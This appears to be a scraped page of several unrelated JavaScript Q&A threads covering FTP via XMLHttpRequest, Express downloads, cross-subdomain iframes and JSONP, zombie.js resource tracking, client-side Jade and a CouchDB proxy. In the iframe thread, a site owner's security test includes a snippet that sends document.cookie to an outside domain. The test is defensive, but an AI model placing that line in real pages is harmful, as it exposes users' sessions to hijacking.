I don't understand why JavaScript can't make FTP calls. Why do we have to make such a request through a server?
Even browsers have the ability to authenticate against and browse an FTP server. Maybe we could use browser APIs to do it?
OK, answering my own question here.
I went through the Mozilla docs on XMLHttpRequest. They specifically say:
Despite its name, XMLHttpRequest can be used to retrieve any type of data, not just XML, and it supports protocols other than HTTP (including file and ftp).
So I am satisfied with this. JavaScript can make calls to FTP using XMLHttpRequest.
The title of this question suggests the requester is keen on understanding whether an FTP transfer could be implemented using JavaScript. However, looking at the answer by the same requester, it appears the question was really just to find out whether URLs with FTP protocols can be used with JS and possibly HTML tags. The answer is yes. Even a simple <a> tag supports FTP URLs in its href attribute. Hope this helps new readers. And yes, the XMLHttpRequest AJAX object does enable calling a URL with an FTP protocol.
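For illustration, a minimal sketch of both approaches; the host and file path below are made up, and note that most recent browsers have since dropped FTP support entirely:
// An FTP URL in a plain anchor tag:
// <a href="ftp://ftp.example.com/pub/readme.txt">Download via FTP</a>

// The same (hypothetical) URL passed to XMLHttpRequest:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'ftp://ftp.example.com/pub/readme.txt', true);
xhr.onload = function () {
    console.log(xhr.responseText);
};
xhr.send();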
Cheers.
There is a JavaScript library at http://ftp.apixml.net/ that allows FTP file uploads via JavaScript.
In this case, technically, the ftpjs server is making the FTP connection to the FTP server, but the instructions are being passed via JavaScript. So this particular library is designed primarily to let developers add a basic file upload mechanism without writing server-side code.
Under the hood, it uses the HTML5 FileReader to read the file into a base64 string, and then posts this back to the server with a CORS AJAX request.
// Script from http://ftp.apixml.net/
// Copyright 2017 http://ftp.apixml.net/, DO NOT REMOVE THIS COPYRIGHT NOTICE
var Ftp = {
    createCORSRequest: function (method, url) {
        var xhr = new XMLHttpRequest();
        if ("withCredentials" in xhr) {
            // Check if the XMLHttpRequest object has a "withCredentials" property.
            // "withCredentials" only exists on XMLHttpRequest2 objects.
            xhr.open(method, url, true);
        } else if (typeof XDomainRequest != "undefined") {
            // Otherwise, check if XDomainRequest is available.
            // XDomainRequest only exists in IE, and is IE's way of making CORS requests.
            xhr = new XDomainRequest();
            xhr.open(method, url);
        } else {
            // Otherwise, CORS is not supported by the browser.
            xhr = null;
        }
        return xhr;
    },
    upload: function (token, files) {
        var file = files[0];
        var reader = new FileReader();
        reader.readAsDataURL(file);
        reader.addEventListener("load",
            function () {
                var base64 = this.result;
                var xhr = Ftp.createCORSRequest('POST', "http://ftp.apixml.net/upload.aspx");
                if (!xhr) {
                    throw new Error('CORS not supported');
                }
                xhr.onreadystatechange = function () {
                    if (xhr.readyState == 4 && xhr.status == 200) {
                        Ftp.callback(file);
                    }
                };
                xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                xhr.send("token=" + token + "&data=" + encodeURIComponent(base64) + "&file=" + file.name);
            },
            false);
    },
    callback: function () {}
};
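For completeness, here is a rough usage sketch wiring Ftp.upload to a file input; the element id and the token are hypothetical placeholders, not values defined by the library:
// 'fileInput' and 'YOUR_API_TOKEN' are placeholders for illustration.
Ftp.callback = function (file) {
    console.log('Uploaded: ' + file.name);
};
document.getElementById('fileInput').addEventListener('change', function () {
    Ftp.upload('YOUR_API_TOKEN', this.files);
});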
It is very difficult to FTP a big file to a backup server without using the HTTP protocol in a web application.
Let's say we have S1 (client browser), S2 (code container server) and S3 (file backup server), and we want to upload a 2 GB file from S1 using FTP.
(use case diagram)
This can be done with a Java applet. We can embed an uploader applet in the web application; the applet will run inside the browser sandbox.
Go through this link: sample code for FTP using an applet.
Note that Java has to be enabled in the browser for this to work.
I have an API link that automatically starts downloading a file if I follow it in the address bar. Let's call it my-third-party-downloading-link-com.
But when, in the Express framework, I set res.redirect(my-third-party-downloading-link-com), I get status code 301 and can see the file content in the Preview tab of the developer tools. But I can't make the browser download this file.
My request handler is the following:
downloadFeed(req, res) {
    const { jobId, platform, fileName } = req.query;
    const host = platform === 'production' ? configs.prodHost : configs.stageHost;
    const downloadLink = `${host}/api/v1/feedfile/${jobId}`;
    // I also tried with these headers:
    // res.setHeader('Content-disposition', `attachment; filename=${fileName}.gz`);
    // res.setHeader('Content-Type', 'application/x-gzip');
    res.redirect(downloadLink);
}
P.S. Now, to solve this problem, I build my-third-party-downloading-link-com on the back end, send it with res.end, and then:
window.open(my-third-party-downloading-link-com, '_blank')
But I don't like this solution. How can I tell the browser to start downloading content from this third-party API?
According to the documentation, you should use res.download() to force a browser to prompt the user for download.
http://expressjs.com/es/api.html#res.download
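As a minimal sketch (the route and file path are hypothetical, not from the question): res.download() sends a file from the server's local filesystem and sets the Content-Disposition header so the browser shows a save dialog. For a third-party URL like the one in the question, the file would first have to be fetched or streamed to your server.
// Hypothetical route and file path, for illustration only.
app.get('/download', (req, res) => {
    res.download('/tmp/feed.gz', 'feed.gz', (err) => {
        if (err && !res.headersSent) res.status(500).end();
    });
});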
I have two subdomains, content and www, under the domain example.com. Content from content.example.com is being presented in www.example.com via an iframe.
Because the content on content.example.com needs to communicate with www.example.com, I've set document.domain = "example.com" and also set allow-scripts and allow-same-origin on the iframe.
I'm concerned that if users can upload the content to be displayed in the iframe, it could be exploitable, i.e., used to send the contents of the cookies to a remote domain to hijack the session, or for other security exploits.
I've set up another domain, www.example2.com, and put an AJAX request in the iframed content at content.example.com to test my theory, sending document.cookie to the remote domain. This results in the _ga cookies being sent to the remote domain. I've allowed header('Access-Control-Allow-Origin: *') on the remote domain so it doesn't cause any issues.
Why are only the _ga cookies being sent? I have a number of other cookies on the same domain and path as the _ga cookies, yet they aren't sent. Are there other security risks in doing this? Ideally I'd like communication to only be possible between content.example.com and www.example.com, and it looks like it's mostly doing this, except for the Google Analytics cookies, which means that others might be able to do it too.
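For concreteness, the test described above amounts to something like this running inside the iframed page (the collect.php endpoint on www.example2.com is a hypothetical name):
// Hypothetical endpoint on the unrelated domain.
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://www.example2.com/collect.php', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('cookies=' + encodeURIComponent(document.cookie));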
You can use JSONP to communicate between different domains, regardless of cross-domain settings and policies.
However, JSONP requires the server side to build the callback function with the returned data as a parameter.
I would suggest loading plain JavaScript content from the server instead, which has the same cross-domain independence and security as a JSONP request.
Say you have a JavaScript file, data.js, in content.example.com (or a service returning the same content in its response), containing a JSON object prefixed with a variable assignment:
result = {
    "string1": "text1",
    "object1": {
        "string2": "text2",
        "number1": 5.6
    },
    "number2": 7,
    "array1": ["text3", "text4"]
};
Then, in your web page on www.example.com, you can have a script with a function loadJS, which loads the server response as a script:
var loadJS = function (url, callback) {
    var script = document.createElement('script');
    script.type = "text/javascript";
    script.src = url;
    script.onload = function (ev) {
        callback(window.result);
        delete window.result;
        this.parentNode.removeChild(this);
    };
    document.body.appendChild(script);
};

window.onload = function () {
    loadJS('http://content.example.com/data.js', function (data) {
        console.log(data);
    });
};
The same function can be used in content.example.com for requests in the opposite direction.
In order to set cookies, or to perform any other functionality available in JS, the response script data.js may contain a function rather than a JSON object:
result = (function () {
    document.cookie = "cookie1=Value1; cookie2=Value2;";
    return true;
})();
I'm currently looking for a way to track all requests made from a website in zombie.js. The idea is to get all information about loaded content (e.g. tracking pixels for ads, analytics tags, images, CSS, ...). Basically, the Network Monitor from the dev tools, in a headless browser.
I'm currently stuck at this point:
var Browser = require("zombie");

var url = "http://stackoverflow.com/";
var browser = new Browser();

browser.visit(url, function(err) {
    for (var i = browser.resources.length - 1; i >= 0; i--) {
        console.log(browser.resources[i].request.url);
    }
});
This is probably the most basic setup, and it will not track anything except some .js requests. I also can't track files which are loaded by some external script. The best example is the Google Tag Manager, which will "hide" all files that it loads.
It would be great if somebody had an idea how to solve this issue.
Thanks in advance
Daniel
What you are looking for is called resources in zombie.js, and you can access them via browser.resources, like:
browser.visit(url).then(function() {
    console.log(browser.resources); // array with downloaded resources
});
You can also create pipes to monitor the resources being downloaded in real time:
browser.pipeline.addHandler(function(browser, request, response) {
    console.log(request, response);
    return response;
});

browser.visit(url).then(function() {
    console.log('successful visit');
});
tl;dr
Is there a way to use Jade completely client-side, like any of the other JavaScript template engines (e.g. Mustache, Handlebars or Nunjucks), so that it loads includes via AJAX?
More Info:
I have a web application that is not running on Node (unfortunately due to various vendors not providing libraries for Node yet) and I have really started liking the syntax and capabilities of Jade. Unfortunately, it seems like everything in Jade requires Node in some capacity, either in the development flow or on the server side. I definitely cannot use it server-side and would prefer not to introduce it to the development cycle just for templating.
It seems like all that would be necessary is to package up the dependencies (this can be done with browserify) and to implement fs so it reads files with AJAX. Is there some implementation of this already?
Also, the time taken to compile once per file, per session is not really a concern for this application.
I actually found a way to do this, completely on the client side:
Use browserify-CDN to obtain a client-side bundle for the Node package.
Implement the readFileSync function of the fs module in the bundle so it uses a synchronous XMLHttpRequest to retrieve the file from the server (the fs stub in the bundle is currently empty, so no such function exists yet).
Voilà!
UPDATE:
Here is my implementation:
2: [function(require, module, exports) {
    module.exports = {
        cache: {},
        readFileSync: function (path) {
            return this.cache[path] || (this.cache[path] = (function () {
                var request = new XMLHttpRequest();
                // Cache-busting timestamp; jQuery has no $.time(), so use Date.now().
                request.open('GET', path + '?_=' + Date.now(), false);
                request.send();
                if (request.status === 200) {
                    return request.responseText;
                } else {
                    throw 'Unable to load template: ' + path;
                }
            }).call());
        }
    };
}, {}]
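As a rough usage sketch, assuming the browserified bundle exposes Jade as a global (how it is exposed depends on the bundle wrapper), jade.renderFile will then pull the template and any includes through the patched readFileSync:
// 'templates/page.jade' and 'app' are hypothetical placeholders.
// jade.renderFile reads the file (and any includes) via the patched
// fs.readFileSync, i.e. over synchronous XMLHttpRequest.
var html = jade.renderFile('templates/page.jade', { title: 'Client-side Jade' });
document.getElementById('app').innerHTML = html;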
I have made a CouchDB design document which works perfectly at the following URL:
http://localhost:5984/db/_design/app/index.html
Now the problem is that I am trying to fetch the page contents and display them from Node.js, but only the HTML page is displayed; the linked CSS and JS files are not working. When I tried to narrow the problem down, I found that the CSS and JS files are supposed to be requested with the CouchDB login credentials, and they are not linking. I even tried adding the auth header in the response parameter, but still no luck.
var http = require('http');
var json;
var root = new Buffer("admin:pass").toString('base64');

http.createServer(function(req, res) {
    res.setHeader('Authorization', root);
    res.writeHead(200, { 'Content-Type': 'text/html' });
    couchPage();
    res.end(json);
}).listen(8080);

function couchPage() {
    var options = {
        hostname: 'localhost',
        port: 5984,
        path: '/db/_design/app/index.html',
        auth: 'admin:pass',
        method: 'GET'
    };
    var req = http.request(options, function(res) {
        res.setEncoding('utf8');
        res.on('data', function (chunk) {
            json = chunk;
        });
    });
    req.end();
}
Could anyone please guide me on where I am wrong?
I think this has nothing to do with couchdb authorization. The problem is that you do not perform any routing on your nodejs server. That is, the browser makes a request to localhost:8080 and receives the content of /db/_design/app/index.html as an answer. Now, the browser detects a link to a stylesheet, say "style.css". It performs a request to localhost:8080/style.css but your nodejs server simply ignores the "style.css" part of the request. Instead, the client will receive the content of /db/_design/app/index.html again!
If you want to serve attachments of your design document through nodejs, you have to parse the request first and then retrieve the corresponding document from couchdb. However, I don't think that you actually want to do this. Either you want to use couchdb in a traditional way behind nodejs (not directly accessible from the client) and then you would just use it as a database with your html (or template) files stored on disk. Or you want to directly expose couchdb to the client and make nodejs listen to events via the couchdb _changes feed.
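For the first option (CouchDB kept behind Node.js), a minimal sketch of the missing routing could look like the following. It simply forwards every requested path to the design document, reusing the credentials, database and port from the question; this is an illustration of the idea, not production code:
var http = require('http');

// Forward every request to CouchDB so that index.html, style.css,
// script.js, etc. all resolve against the design document.
http.createServer(function (req, res) {
    var path = req.url === '/' ? '/index.html' : req.url;
    var proxyReq = http.request({
        hostname: 'localhost',
        port: 5984,
        path: '/db/_design/app' + path,
        auth: 'admin:pass',
        method: req.method
    }, function (proxyRes) {
        res.writeHead(proxyRes.statusCode, proxyRes.headers);
        proxyRes.pipe(res); // stream the CouchDB response straight through
    });
    req.pipe(proxyReq);
}).listen(8080);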